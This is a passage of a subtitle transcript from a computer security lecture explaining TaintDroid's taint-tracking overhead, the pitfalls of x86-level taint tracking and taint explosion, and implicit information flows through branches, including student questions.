calculating the length of that list 877 00:42:38,410 --> 00:42:41,360 won't actually result in the generation of value 878 00:42:41,360 --> 00:42:43,630 that is tainted at all. 879 00:42:43,630 --> 00:42:45,200 So does that makes sense? 880 00:42:45,200 --> 00:42:47,772 That may seem a little bit counterintuitive, 881 00:42:47,772 --> 00:42:49,230 and this is one of the reasons why, 882 00:42:49,230 --> 00:42:51,521 for example, like when we were talking about the array, 883 00:42:51,521 --> 00:42:52,080 for example. 884 00:42:52,080 --> 00:42:54,410 They say array.length, I'm not going 885 00:42:54,410 --> 00:42:56,110 to generate any taint for that. 886 00:42:56,110 --> 00:43:00,390 It's because of reasons like this. 887 00:43:00,390 --> 00:43:04,950 If you wanted a stronger assurance 888 00:43:04,950 --> 00:43:06,810 about-- not stronger assurance. 889 00:43:06,810 --> 00:43:08,730 But if you actually want to calculate 890 00:43:08,730 --> 00:43:14,620 the length of the list to generate a kind of value, 891 00:43:14,620 --> 00:43:16,650 we could imagine that your implementation, it's 892 00:43:16,650 --> 00:43:19,857 a bit goofy, but you can just decide to touch data 893 00:43:19,857 --> 00:43:21,940 for no real semantic reason other than to generate 894 00:43:21,940 --> 00:43:24,156 taint in the resulting length. 895 00:43:24,156 --> 00:43:26,280 Or, as I'll discuss towards the end of the lecture, 896 00:43:26,280 --> 00:43:27,780 you could actually use a language 897 00:43:27,780 --> 00:43:31,740 which allows you the programmer to define 898 00:43:31,740 --> 00:43:33,780 your own types of taint. 899 00:43:33,780 --> 00:43:36,530 And then you can actually define your own policies 900 00:43:36,530 --> 00:43:38,280 for things like this. 901 00:43:38,280 --> 00:43:41,146 One nice thing about TaintDroid is that you as a developer, 902 00:43:41,146 --> 00:43:42,520 you don't have to label anything. 903 00:43:42,520 --> 00:43:44,144 TaintDroid basically does that for you. 904 00:43:44,144 --> 00:43:46,767 It says here's all the sensitive stuff that can be a source, 905 00:43:46,767 --> 00:43:48,850 here's all the sensitive stuff that can be a sink. 906 00:43:48,850 --> 00:43:51,104 You as a developer, you're ready to go. 907 00:43:51,104 --> 00:43:53,020 But if you want that pointer to be controlled, 908 00:43:53,020 --> 00:43:56,700 you might have to build some of the policies yourself. 909 00:43:56,700 --> 00:44:04,364 All right, so in terms of performance overhead 910 00:44:04,364 --> 00:44:06,030 of TaintDroid, what does that look like? 911 00:44:08,550 --> 00:44:11,710 The overheads actually seem to be pretty reasonable. 912 00:44:11,710 --> 00:44:16,006 So there's going to be memory overhead, and that's 913 00:44:16,006 --> 00:44:18,070 the memory overhead, essentially, 914 00:44:18,070 --> 00:44:21,730 of storing all of these taint tags. 915 00:44:21,730 --> 00:44:27,320 And so there's going to be CPU overhead, 916 00:44:27,320 --> 00:44:32,290 and this is basically to assign, propagate, and check 917 00:44:32,290 --> 00:44:34,720 those taint calculations. 918 00:44:34,720 --> 00:44:36,600 And that's because of overhead like here. 919 00:44:36,600 --> 00:44:38,640 So any interpreting for the Dalvik VM, 920 00:44:38,640 --> 00:44:40,470 we're actually doing additional work. 921 00:44:40,470 --> 00:44:44,080 So looking at the source, looking at this 32 bit taint 922 00:44:44,080 --> 00:44:47,209 information, we're doing the or operations 923 00:44:47,209 --> 00:44:49,250 that we discussed before, and so on and so forth. 924 00:44:49,250 --> 00:44:52,260 So that's computational overhead. 925 00:44:52,260 --> 00:44:54,610 These overheads actually seem to be pretty moderate. 926 00:44:54,610 --> 00:45:01,540 So for memory, the authors report about 3% to 5% 927 00:45:01,540 --> 00:45:03,910 in terms of the extra RAM space you 928 00:45:03,910 --> 00:45:06,015 need to store those taint tags. 929 00:45:06,015 --> 00:45:07,550 So that's not too bad. 930 00:45:07,550 --> 00:45:11,460 The CPU overhead is higher, which I think makes sense. 931 00:45:11,460 --> 00:45:18,610 They're both somewhere between, let's say, 3% and about 29% CPU 932 00:45:18,610 --> 00:45:19,661 overhead. 933 00:45:19,661 --> 00:45:22,160 And the reason why I think it's reasonable to see why that's 934 00:45:22,160 --> 00:45:27,080 higher is because you can imagine that every time you 935 00:45:27,080 --> 00:45:28,850 step into the interpreter loop, you're 936 00:45:28,850 --> 00:45:31,440 having to look at these tags and do some operations. 937 00:45:31,440 --> 00:45:34,850 So even though it is all these bitwise operations, 938 00:45:34,850 --> 00:45:36,690 you have to do that all the time. 939 00:45:36,690 --> 00:45:39,960 So that seems like it's going to get painful, whereas basically, 940 00:45:39,960 --> 00:45:43,630 the overhead for this, OK, so you put a couple extra integers 941 00:45:43,630 --> 00:45:44,740 in memory somewhere. 942 00:45:44,740 --> 00:45:48,340 That doesn't seem, maybe, too bad. 943 00:45:48,340 --> 00:45:53,570 Even on it's high end, 29%, in of itself maybe that's OK, 944 00:45:53,570 --> 00:45:56,664 because Silicon Valley keeps telling us 945 00:45:56,664 --> 00:45:59,080 that we need phones that have like quad cores and whatnot, 946 00:45:59,080 --> 00:46:01,329 so probably have a lot of spare cycles sitting around. 947 00:46:01,329 --> 00:46:03,550 So maybe that's not all that crushing. 948 00:46:03,550 --> 00:46:06,750 Although there might be a problem with battery life. 949 00:46:06,750 --> 00:46:08,567 So even if you have these extra cores, 950 00:46:08,567 --> 00:46:10,900 you might not want your phone getting hot in your pocket 951 00:46:10,900 --> 00:46:12,950 as you're just sitting there, just sort 952 00:46:12,950 --> 00:46:15,100 of churning and calculating some of this stuff. 953 00:46:15,100 --> 00:46:17,400 I think for here, the main issue here 954 00:46:17,400 --> 00:46:19,400 would be if this is bad for your battery. 955 00:46:19,400 --> 00:46:21,235 If it's not bad for your battery, 956 00:46:21,235 --> 00:46:23,985 then probably even at that high end, that may not be that bad. 957 00:46:28,800 --> 00:46:30,860 So that is essentially an overview 958 00:46:30,860 --> 00:46:32,785 of how TaintDroid works. 959 00:46:32,785 --> 00:46:34,564 Any more questions before we-- 960 00:46:34,564 --> 00:46:37,516 AUDIENCE: Do you tag something that also 961 00:46:37,516 --> 00:46:39,484 has been there all the time? 962 00:46:39,484 --> 00:46:41,698 Do you tag every variable, or only 963 00:46:41,698 --> 00:46:43,420 tag the ones that have this? 964 00:46:43,420 --> 00:46:46,840 PROFESSOR: Yes, so you basically tag everything. 965 00:46:46,840 --> 00:46:52,518 So in theory, there's nothing that prevents you 966 00:46:52,518 --> 00:46:56,917 from not allocating any taint information for stuff that 967 00:46:56,917 --> 00:46:57,750 has no taint at all. 968 00:46:57,750 --> 00:47:00,170 I think the problem, then, with it-- 969 00:47:00,170 --> 00:47:04,545 then once something gains even one bit of taint, 970 00:47:04,545 --> 00:47:07,770 then you have to do dynamic sort of layout changes. 971 00:47:07,770 --> 00:47:11,670 So what if on the stack, this local here, then it 972 00:47:11,670 --> 00:47:13,670 had a taint, so now you're allocating with this, 973 00:47:13,670 --> 00:47:14,303 and it does get taint. 974 00:47:14,303 --> 00:47:16,520 Or you have that extra taint flag live on the heap, 975 00:47:16,520 --> 00:47:18,020 and you're going to see how it rewrites the stack, 976 00:47:18,020 --> 00:47:20,140 and then someone made your code-- so we're 977 00:47:20,140 --> 00:47:21,306 going to see how that works. 978 00:47:21,306 --> 00:47:25,210 So in practice, typical use is like shadow memory somehow, 979 00:47:25,210 --> 00:47:29,800 so every byte in the application is backed up 980 00:47:29,800 --> 00:47:32,060 by some byte of extra information somewhere. 981 00:47:32,060 --> 00:47:35,060 And in the case of TaintDroid, that shadowing actually 982 00:47:35,060 --> 00:47:37,060 lives alongside of the actual variable itself. 983 00:47:37,060 --> 00:47:40,060 Anyone has another question? 984 00:47:40,060 --> 00:47:41,860 OK. 985 00:47:41,860 --> 00:47:43,302 Cool. 986 00:47:43,302 --> 00:47:46,720 This system essentially tracks information 987 00:47:46,720 --> 00:47:53,840 at the level of these high level Dalvik VM instructions. 988 00:47:53,840 --> 00:47:59,310 So one thing you might think to yourself 989 00:47:59,310 --> 00:48:11,230 is, could we track taint at the level of x86 instructions 990 00:48:11,230 --> 00:48:14,087 or the ARM instructions. 991 00:48:17,797 --> 00:48:19,255 One reason why that might be useful 992 00:48:19,255 --> 00:48:22,470 is because then we could actually 993 00:48:22,470 --> 00:48:26,650 understand how information flows through arbitrary applications, 994 00:48:26,650 --> 00:48:30,160 not just ones that are running inside this tricked out 995 00:48:30,160 --> 00:48:33,270 VM that requires you to run Java and so on and so forth. 996 00:48:33,270 --> 00:48:37,367 So why not track taint at that level. 997 00:48:37,367 --> 00:48:39,200 It turns out that you can, in fact, do that. 998 00:48:39,200 --> 00:48:42,100 So there are projects that we looked at at tracking taint 999 00:48:42,100 --> 00:48:43,960 at this low level. 1000 00:48:43,960 --> 00:48:46,768 What's nice is that you maybe get that increased coverage. 1001 00:48:46,768 --> 00:48:48,724 You don't throw a line into [INAUDIBLE] 1002 00:48:48,724 --> 00:48:51,560 for how, for example, Java code interacts with native code 1003 00:48:51,560 --> 00:48:52,060 methods. 1004 00:48:52,060 --> 00:48:54,015 It's all eventually going to result down 1005 00:48:54,015 --> 00:48:56,324 to x86 instructions executed, so that 1006 00:48:56,324 --> 00:48:58,740 removed a lot of the manual effort that you as a developer 1007 00:48:58,740 --> 00:49:01,819 have to do to sort of understand it's the taint semantics if you 1008 00:49:01,819 --> 00:49:02,610 use native methods. 1009 00:49:02,610 --> 00:49:07,210 But the problem with that, if we track at this low level, 1010 00:49:07,210 --> 00:49:11,540 it can be very expensive to do this. 1011 00:49:11,540 --> 00:49:17,460 You can also get a lot of false positives. 1012 00:49:17,460 --> 00:49:20,160 So if they're spec'd to the expense, 1013 00:49:20,160 --> 00:49:24,217 there's also this issue of correctness. 1014 00:49:26,750 --> 00:49:31,050 As you may know, x86 is an adversarially complex 1015 00:49:31,050 --> 00:49:32,690 instruction set. 1016 00:49:32,690 --> 00:49:34,830 There's all kinds of crazy things that it can do. 1017 00:49:34,830 --> 00:49:38,540 I don't know if you've ever seen an x86 instruction manual, 1018 00:49:38,540 --> 00:49:39,810 they're huge. 1019 00:49:39,810 --> 00:49:42,730 So they'll have one huge manual that's this thick, 1020 00:49:42,730 --> 00:49:45,710 and then it'll say this is instructions whose letters 1021 00:49:45,710 --> 00:49:48,435 start with M through P, and there'll be this full on series 1022 00:49:48,435 --> 00:49:50,172 about that. 1023 00:49:50,172 --> 00:49:52,270 So it's actually pretty tricky to think 1024 00:49:52,270 --> 00:49:54,295 about what it means to actually track taint 1025 00:49:54,295 --> 00:49:57,130 at the level of x86 instruction. 1026 00:49:57,130 --> 00:49:59,605 Because even seemingly simple instructions, 1027 00:49:59,605 --> 00:50:02,080 like sometimes at, they're setting 1028 00:50:02,080 --> 00:50:04,060 all types of internal processor registers 1029 00:50:04,060 --> 00:50:05,840 and flags and things like that. 1030 00:50:05,840 --> 00:50:08,400 So it's very difficult to describe in the first place. 1031 00:50:08,400 --> 00:50:12,220 If you could do that, it's also oftentimes very expensive. 1032 00:50:12,220 --> 00:50:16,547 You're sort of looking at things at a very, very low level. 1033 00:50:16,547 --> 00:50:18,310 So the amount of state you have to track 1034 00:50:18,310 --> 00:50:19,914 might get very large very quickly. 1035 00:50:19,914 --> 00:50:22,710 It might be a very sensitive computational clause. 1036 00:50:22,710 --> 00:50:25,090 Then there's this issue of false positives. 1037 00:50:25,090 --> 00:50:29,180 This is actually pretty devastating. 1038 00:50:29,180 --> 00:50:34,576 You can get into bad problems if you ever 1039 00:50:34,576 --> 00:50:42,729 have kernel data that improperly gets tainted. 1040 00:50:47,719 --> 00:50:52,960 And if this happens, maybe because your infrastructure's 1041 00:50:52,960 --> 00:50:56,034 trying to be ultraconservative, it doesn't want 1042 00:50:56,034 --> 00:50:57,450 to miss anything, so it says well, 1043 00:50:57,450 --> 00:50:59,480 I'm going to err on the side of security. 1044 00:50:59,480 --> 00:51:02,740 And I'm going to taint some of this kernel data structure, 1045 00:51:02,740 --> 00:51:07,470 then what you get here is this exciting term they 1046 00:51:07,470 --> 00:51:09,190 call taint explosion. 1047 00:51:09,190 --> 00:51:11,730 What this basically means is that at a certain point, 1048 00:51:11,730 --> 00:51:13,780 there are certain things that if they end up getting tainted, 1049 00:51:13,780 --> 00:51:15,446 they're involved in so many calculations 1050 00:51:15,446 --> 00:51:18,342 that essentially everything in your program gets polluted. 1051 00:51:18,342 --> 00:51:20,550 It's like one of these things in Dungeons and Dragons 1052 00:51:20,550 --> 00:51:22,900 where you touch this evil thing and eventually 1053 00:51:22,900 --> 00:51:26,395 death spreads throughout your body. 1054 00:51:26,395 --> 00:51:29,624 This is very bad, because if you can't tightly 1055 00:51:29,624 --> 00:51:32,140 constrain the way that taint flows through the system, 1056 00:51:32,140 --> 00:51:34,510 then eventually what's going to end up happening 1057 00:51:34,510 --> 00:51:34,984 is that you let this run for a while, 1058 00:51:34,984 --> 00:51:36,984 the system's going to say you can't do anything. 1059 00:51:36,984 --> 00:51:38,964 You can't send anything over the network, 1060 00:51:38,964 --> 00:51:40,672 you can't display anything on the screen, 1061 00:51:40,672 --> 00:51:42,270 because everything in your system 1062 00:51:42,270 --> 00:51:44,700 seems like it's been tainted by some sensitive error, 1063 00:51:44,700 --> 00:51:47,350 even if that's not the case. 1064 00:51:47,350 --> 00:51:53,980 One way that this can happen is if somehow 1065 00:51:53,980 --> 00:51:59,700 the stack pointer or the break pointer get tainted. 1066 00:52:03,780 --> 00:52:06,819 If this happens, you're probably in a world of hurt. 1067 00:52:06,819 --> 00:52:09,540 You can imagine that all of the instructions in x86, 1068 00:52:09,540 --> 00:52:15,100 for example, that access the stack, they all go through ESB. 1069 00:52:15,100 --> 00:52:19,130 So the stack register gets corrupted somehow, that's bad. 1070 00:52:19,130 --> 00:52:20,910 If the break point register gets bad, 1071 00:52:20,910 --> 00:52:24,065 a lot of times when you want your equivalents to access 1072 00:52:24,065 --> 00:52:28,238 local variables, it has to go the EBP indirectly. 1073 00:52:28,238 --> 00:52:31,070 So if anybody ever touches those in terms of taint, 1074 00:52:31,070 --> 00:52:32,355 it's basically game over. 1075 00:52:32,355 --> 00:52:33,980 So there's a link in the lecture that's 1076 00:52:33,980 --> 00:52:36,063 about a paper that acknowledges some of this stuff 1077 00:52:36,063 --> 00:52:39,540 and basically says that we have to be very careful when we do 1078 00:52:39,540 --> 00:52:42,274 taint tracking at this low level because very quickly, if you're 1079 00:52:42,274 --> 00:52:44,190 looking at how this works in the Linux kernel, 1080 00:52:44,190 --> 00:52:46,564 there are certain optimizations the Linux kernel would do 1081 00:52:46,564 --> 00:52:49,054 to make its code fast, but will result, unintentionally, 1082 00:52:49,054 --> 00:52:51,960 in the break pointer or the stack pointer getting tainted. 1083 00:52:51,960 --> 00:52:54,407 And once that happens, you can't really do anything useful 1084 00:52:54,407 --> 00:52:55,698 with the taint tracking system. 1085 00:52:55,698 --> 00:53:01,316 AUDIENCE: So how do you do this [INAUDIBLE] programs? 1086 00:53:01,316 --> 00:53:04,120 It seems like you have all these register files in the CPU. 1087 00:53:04,120 --> 00:53:06,210 PROFESSOR: Yeah, so great. 1088 00:53:06,210 --> 00:53:08,261 So all those register files, it hangs back 1089 00:53:08,261 --> 00:53:09,260 to the correctness case. 1090 00:53:09,260 --> 00:53:11,362 So unless you are very, very good 1091 00:53:11,362 --> 00:53:12,790 at understanding x86 architecture, 1092 00:53:12,790 --> 00:53:14,694 there are going to be things that you miss. 1093 00:53:14,694 --> 00:53:17,550 It terms of computation level, how do you actually 1094 00:53:17,550 --> 00:53:18,260 do this thing. 1095 00:53:18,260 --> 00:53:22,307 There's this-- I think the most popular way, 1096 00:53:22,307 --> 00:53:23,640 and I could be wrong about this. 1097 00:53:23,640 --> 00:53:25,406 So when I say it's popular, the way I 1098 00:53:25,406 --> 00:53:28,010 know about, because I'm a knowledge [INAUDIBLE], right. 1099 00:53:28,010 --> 00:53:31,050 There's this system submitter called Bochs, 1100 00:53:31,050 --> 00:53:35,552 I think it's spelled like this. 1101 00:53:35,552 --> 00:53:37,010 They actually have something called 1102 00:53:37,010 --> 00:53:43,600 TaintBochs, which actually does x86 level innuation of flow. 1103 00:53:43,600 --> 00:53:45,390 And it's actually an interpreter, 1104 00:53:45,390 --> 00:53:47,840 you can think of it as. 1105 00:53:47,840 --> 00:53:50,166 So it's going to take your entire OS and all 1106 00:53:50,166 --> 00:53:51,970 your applications, and it's going 1107 00:53:51,970 --> 00:53:55,450 to look at each x86 instruction and try to simulate 1108 00:53:55,450 --> 00:53:57,230 what the hardware would do. 1109 00:53:57,230 --> 00:53:59,090 So you can imagine this is very, very slow. 1110 00:53:59,090 --> 00:54:00,940 What's nice about that is you don't require any hardware 1111 00:54:00,940 --> 00:54:03,290 support, and then it's relatively straightforward 1112 00:54:03,290 --> 00:54:06,794 to tweak your software model of how things work, 1113 00:54:06,794 --> 00:54:08,210 if you discovered that you weren't 1114 00:54:08,210 --> 00:54:10,460 tracking some registered files or something like that. 1115 00:54:10,460 --> 00:54:14,114 AUDIENCE: So the ideal solution would be architectural support. 1116 00:54:14,114 --> 00:54:15,715 PROFESSOR: Yeah, so there have been 1117 00:54:15,715 --> 00:54:17,240 techniques to do that, too. 1118 00:54:17,240 --> 00:54:22,179 That gets a little bit subtle because, for example, 1119 00:54:22,179 --> 00:54:23,720 if you look here you've looked at how 1120 00:54:23,720 --> 00:54:27,488 we've allocated the taint state next to the variables 1121 00:54:27,488 --> 00:54:28,840 themselves. 1122 00:54:28,840 --> 00:54:31,610 So if you bake in that support in the hardware, 1123 00:54:31,610 --> 00:54:34,565 it can be very difficult to, for example, change the way 1124 00:54:34,565 --> 00:54:35,920 you want the layout to work. 1125 00:54:35,920 --> 00:54:37,836 Because then it's like baked into the silicon. 1126 00:54:37,836 --> 00:54:42,258 You could imagine doing some of this because at a high level-- 1127 00:54:42,258 --> 00:54:43,580 where do we have it. 1128 00:54:43,580 --> 00:54:47,716 So the Dalvik VM and TaintDroid is executing these high level 1129 00:54:47,716 --> 00:54:49,960 instructions and it's assigning taint at this level. 1130 00:54:49,960 --> 00:54:52,340 You can imagine doing that at the hardware level, too. 1131 00:54:52,340 --> 00:54:53,840 So actually, if this is the silicon, 1132 00:54:53,840 --> 00:54:55,340 you can probably make that work. 1133 00:54:55,340 --> 00:54:56,840 So that's definitely possible. 1134 00:54:56,840 --> 00:54:58,340 You had a question? 1135 00:54:58,340 --> 00:55:00,840 AUDIENCE: What does TaintDroid do 1136 00:55:00,840 --> 00:55:03,840 with information built from branching and permission tests. 1137 00:55:03,840 --> 00:55:06,090 PROFESSOR: Oh, we're going to get to that in a second. 1138 00:55:06,090 --> 00:55:08,339 So just hold that thought, we're going to get to that. 1139 00:55:08,339 --> 00:55:10,588 AUDIENCE: I'm curious, how long was it 1140 00:55:10,588 --> 00:55:13,796 to things like buffer overflow because all the things are so 1141 00:55:13,796 --> 00:55:14,962 nested together [INAUDIBLE]? 1142 00:55:18,850 --> 00:55:20,340 PROFESSOR: That's a good question. 1143 00:55:20,340 --> 00:55:24,530 So presumably, one would hope that in a language like Java 1144 00:55:24,530 --> 00:55:26,950 there are no buffer overflow, right. 1145 00:55:26,950 --> 00:55:29,436 But you can imagine in a language like C, 1146 00:55:29,436 --> 00:55:31,700 for example, where you didn't have this protection, 1147 00:55:31,700 --> 00:55:33,950 maybe there's something catastrophic that could happen 1148 00:55:33,950 --> 00:55:35,964 or somehow, if you did a buffer overflow 1149 00:55:35,964 --> 00:55:37,880 and then you were able to overwrite taint tags 1150 00:55:37,880 --> 00:55:41,239 and you could set this to zeros, then you could just 1151 00:55:41,239 --> 00:55:42,280 let your data exfiltrate. 1152 00:55:42,280 --> 00:55:45,196 AUDIENCE: I think if it's super predictable, 1153 00:55:45,196 --> 00:55:47,626 like one every other one for the next q variables, 1154 00:55:47,626 --> 00:55:49,084 there's no stacking-- 1155 00:55:49,084 --> 00:55:51,546 PROFESSOR: I was going to say, that's exactly right. 1156 00:55:51,546 --> 00:55:52,550 So you run into somewhat similar issues 1157 00:55:52,550 --> 00:55:54,720 like what we can discuss with the stack canaries, 1158 00:55:54,720 --> 00:55:57,520 because basically we have this data on the stack, 1159 00:55:57,520 --> 00:56:00,370 like in this particular layout, that you don't neither 1160 00:56:00,370 --> 00:56:02,720 want to make it impossible to overwrite, 1161 00:56:02,720 --> 00:56:05,400 or if it is overwritten, one that's hacked in some way. 1162 00:56:05,400 --> 00:56:07,264 So you're exactly right about that. 1163 00:56:12,120 --> 00:56:16,069 So you can in fact do taint tracking at this low level 1164 00:56:16,069 --> 00:56:18,360 although it may be expensive and a little bit difficult 1165 00:56:18,360 --> 00:56:19,700 to get right. 1166 00:56:19,700 --> 00:56:21,980 So you might say well, why don't we just punt 1167 00:56:21,980 --> 00:56:24,313 on this whole issue of taint tracking in the first place 1168 00:56:24,313 --> 00:56:26,870 and instead we're just going to look at the things 1169 00:56:26,870 --> 00:56:29,450 that the program tries to output over the network, let's say, 1170 00:56:29,450 --> 00:56:32,290 and just do a scan for data that seems sensitive. 1171 00:56:32,290 --> 00:56:34,150 That seems to be much more lightweight, 1172 00:56:34,150 --> 00:56:37,240 you don't have to do this dynamic instrumentation of all 1173 00:56:37,240 --> 00:56:39,240 the things the program's doing. 1174 00:56:39,240 --> 00:56:41,600 The problem with that, though, is that that will only 1175 00:56:41,600 --> 00:56:43,210 work as a heuristic. 1176 00:56:43,210 --> 00:56:46,100 In fact, if the attacker knows that this is what you're doing, 1177 00:56:46,100 --> 00:56:47,871 then it's pretty easy to subvert that. 1178 00:56:47,871 --> 00:56:49,620 So if you're just sitting there and you're 1179 00:56:49,620 --> 00:56:53,940 trying to do a grep for numbers, Social Security numbers, 1180 00:56:53,940 --> 00:56:57,030 then the attacker can just use base 64 encoding, 1181 00:56:57,030 --> 00:56:59,190 or do some other wacky thing, compress it. 1182 00:56:59,190 --> 00:57:01,630 It's actually trivial to get past that type of filter. 1183 00:57:01,630 --> 00:57:03,360 So in practice, that's completely 1184 00:57:03,360 --> 00:57:06,060 insufficient from the security perspective. 1185 00:57:06,060 --> 00:57:07,650 Now let's get back to the question 1186 00:57:07,650 --> 00:57:11,650 that you brought up, which was basically 1187 00:57:11,650 --> 00:57:16,380 how can we track flows through things like branches, 1188 00:57:16,380 --> 00:57:17,290 for example. 1189 00:57:17,290 --> 00:57:20,312 So this is basically going to lead us 1190 00:57:20,312 --> 00:57:27,450 to a topic that's called implicit flows. 1191 00:57:27,450 --> 00:57:29,900 And so an implicit flow occurs typically 1192 00:57:29,900 --> 00:57:32,540 when you have a tainted value that's 1193 00:57:32,540 --> 00:57:38,560 going to affect the way that another variable is assigned, 1194 00:57:38,560 --> 00:57:42,730 even though that implicit flow variable doesn't directly 1195 00:57:42,730 --> 00:57:43,530 assign variables. 1196 00:57:43,530 --> 00:57:46,470 This will make more sense with a concrete example. 1197 00:57:46,470 --> 00:57:51,980 Let's say that you have an if statement that does something 1198 00:57:51,980 --> 00:57:54,130 like, it's going to look at your INEI 1199 00:57:54,130 --> 00:57:58,110 and it's going to say if it's greater than 42, 1200 00:57:58,110 --> 00:58:03,340 maybe I'm going to assign 0 to x. 1201 00:58:03,340 --> 00:58:08,350 Otherwise I'm going to assign 1. 1202 00:58:08,350 --> 00:58:11,430 So what's interesting here is that we're 1203 00:58:11,430 --> 00:58:14,240 looking at this sensitive data here 1204 00:58:14,240 --> 00:58:16,960 and we're doing some comparison of it up here, 1205 00:58:16,960 --> 00:58:19,610 but when we're assigning to x down here, 1206 00:58:19,610 --> 00:58:21,470 we're not actually assigning something 1207 00:58:21,470 --> 00:58:26,940 that is directly derived from the sensitive data here. 1208 00:58:26,940 --> 00:58:29,200 This is an example of one of these implicit flows. 1209 00:58:29,200 --> 00:58:31,070 Because the value of x is actually 1210 00:58:31,070 --> 00:58:34,880 dependent on this thing here, but the adversary, 1211 00:58:34,880 --> 00:58:37,380 if they're clever, can sort of structure their code in a way 1212 00:58:37,380 --> 00:58:39,340 that there's no direct assignment. 1213 00:58:39,340 --> 00:58:42,427 Now note that even here, instead of just assigning to x, 1214 00:58:42,427 --> 00:58:44,260 you can just say let's try to send something 1215 00:58:44,260 --> 00:58:45,190 over the network. 1216 00:58:45,190 --> 00:58:48,440 You might say over the network x is 0, 1217 00:58:48,440 --> 00:58:50,250 or x is 1, or something like that. 1218 00:58:50,250 --> 00:58:53,860 So that's an example of one of these implicit flows that 1219 00:58:53,860 --> 00:58:57,050 a system like TaintDroid cannot actually handle. 1220 00:58:57,050 --> 00:59:00,990 So do people sort of see the problem here at a high level? 1221 00:59:00,990 --> 00:59:01,490 Yes. 1222 00:59:01,490 --> 00:59:03,890 This is called an explicit flow as contrast 1223 00:59:03,890 --> 00:59:08,042 to those direct flows like from the assignment operator. 1224 00:59:08,042 --> 00:59:15,838 AUDIENCE: What if [INAUDIBLE] a native power function that 1225 00:59:15,838 --> 00:59:17,335 did exactly [INAUDIBLE]? 1226 00:59:20,735 --> 00:59:23,355 Because the output in that case would be, right? 1227 00:59:23,355 --> 00:59:24,480 PROFESSOR: Well, let's see. 1228 00:59:24,480 --> 00:59:26,074 So it depends. 1229 00:59:26,074 --> 00:59:28,002 So if I understand your question correctly, 1230 00:59:28,002 --> 00:59:29,930 you're saying there could be some native function that 1231 00:59:29,930 --> 00:59:31,440 does something that's sort of equivalent to this, 1232 00:59:31,440 --> 00:59:34,016 and so for example, TaintDroid wouldn't know necessarily, 1233 00:59:34,016 --> 00:59:35,890 because it can't look inside this native code 1234 00:59:35,890 --> 00:59:38,627 to see this type of thing. 1235 00:59:38,627 --> 00:59:40,925 The way that the authors claim that they would handle 1236 00:59:40,925 --> 00:59:44,775 that is that they would say for native methods that are defined 1237 00:59:44,775 --> 00:59:47,380 by the VM itself, they would look at the contract 1238 00:59:47,380 --> 00:59:49,140 that method exposes and they might 1239 00:59:49,140 --> 00:59:51,540 say things like I take these two integers 1240 00:59:51,540 --> 00:59:52,980 and then return the average. 1241 00:59:52,980 --> 00:59:54,960 So then the TaintDroid system would 1242 00:59:54,960 --> 00:59:57,224 say we trust that the native function does that, so we 1243 00:59:57,224 --> 00:59:59,224 need to figure out what the appropriate tainting 1244 00:59:59,224 --> 01:00:00,380 policy should be. 1245 01:00:00,380 --> 01:00:03,165 However, you are correct that if something like this 1246 01:00:03,165 --> 01:00:05,880 was sort of hidden inside and for whatever reason wasn't 1247 01:00:05,880 --> 01:00:07,850 exposed to the public-facing contract, 1248 01:00:07,850 --> 01:00:13,310 then the manual policy that the TaintDroid authors came up with 1249 01:00:13,310 --> 01:00:15,220 might not catch this implicit flow. 1250 01:00:15,220 --> 01:00:16,700 It might actually allow information 1251 01:00:16,700 --> 01:00:17,534 to leak out somehow. 1252 01:00:17,534 --> 01:00:19,367 But I mean for that matter, there might even 1253 01:00:19,367 --> 01:00:23,514 be a direct flow in there that the TaintDroid authors couldn't 1254 01:00:23,514 --> 01:00:26,958 see and you might still have an even more direct leak. 1255 01:00:26,958 --> 01:00:30,402 AUDIENCE: So in practice, this seems very dangerous, right? 1256 01:00:30,402 --> 01:00:32,862 Because you can literally send the whole [INAUDIBLE] value 1257 01:00:32,862 --> 01:00:37,782 by just looking at this last three-- 1258 01:00:37,782 --> 01:00:38,870 PROFESSOR: That's right. 1259 01:00:38,870 --> 01:00:40,780 We had class a few times where you'd sit in a while loop 1260 01:00:40,780 --> 01:00:42,990 and you'd try to construct these implicit flows to do 1261 01:00:42,990 --> 01:00:44,050 these types of things. 1262 01:00:44,050 --> 01:00:45,950 There's actually some ways that you 1263 01:00:45,950 --> 01:00:49,390 can think about trying to fix some of this stuff. 1264 01:00:49,390 --> 01:00:52,142 At a high level, one approach you 1265 01:00:52,142 --> 01:00:53,618 can do to try to prevent this stuff 1266 01:00:53,618 --> 01:01:03,600 is you can actually assign a taint tag to the PC. 1267 01:01:07,390 --> 01:01:18,690 Then essentially you taint it with the branch test. 1268 01:01:18,690 --> 01:01:23,130 So the idea here is that we as humans can look at this code 1269 01:01:23,130 --> 01:01:25,380 here and we can tell that there's this implicit flow 1270 01:01:25,380 --> 01:01:28,470 here, because we know that somehow to get here, 1271 01:01:28,470 --> 01:01:30,355 we had to look at the sensitive data. 1272 01:01:30,355 --> 01:01:32,480 So what does that mean at the implementation level? 1273 01:01:32,480 --> 01:01:33,979 That means that to get here, there's 1274 01:01:33,979 --> 01:01:39,180 something about the PC that has been tainted by sensitive data. 1275 01:01:39,180 --> 01:01:40,710 To say that we have gotten here is 1276 01:01:40,710 --> 01:01:43,450 to say the PC has been set to here or to here. 1277 01:01:43,450 --> 01:01:48,090 At a high level we could imagine that the system would 1278 01:01:48,090 --> 01:01:49,860 do some analysis and it would say 1279 01:01:49,860 --> 01:01:54,050 that at this point in the code, the PC has no taint at all. 1280 01:01:54,050 --> 01:01:57,180 At this point, it gets tainted somehow by the INEI, 1281 01:01:57,180 --> 01:02:01,820 and at this point here, it's going to have that taint. 1282 01:02:01,820 --> 01:02:06,257 So what will end up happening is that if x is a variable that 1283 01:02:06,257 --> 01:02:08,090 initially shows up with no taint maybe we'll 1284 01:02:08,090 --> 01:02:09,675 say OK, at this point, it's actually 1285 01:02:09,675 --> 01:02:11,800 going to give the taint of the PC which is actually 1286 01:02:11,800 --> 01:02:13,450 going to taint it there. 1287 01:02:13,450 --> 01:02:15,787 So there's some sublety here that I'm glossing over, 1288 01:02:15,787 --> 01:02:18,200 but at a high level that's how you can capture some 1289 01:02:18,200 --> 01:02:20,450 of these flows here by actually looking and seeing how 1290 01:02:20,450 --> 01:02:22,345 the PC is getting set, and then trying 1291 01:02:22,345 --> 01:02:28,190 to propagate that to the targets of these if statements. 1292 01:02:28,190 --> 01:02:30,390 Does that all makes sense? 1293 01:02:30,390 --> 01:02:30,940 OK. 1294 01:02:30,940 --> 01:02:32,648 And if you're interested in learning more 1295 01:02:32,648 --> 01:02:36,005 about this, come talk to me, there's been a lot of research 1296 01:02:36,005 --> 01:02:37,340 into this kind of stuff. 1297 01:02:37,340 --> 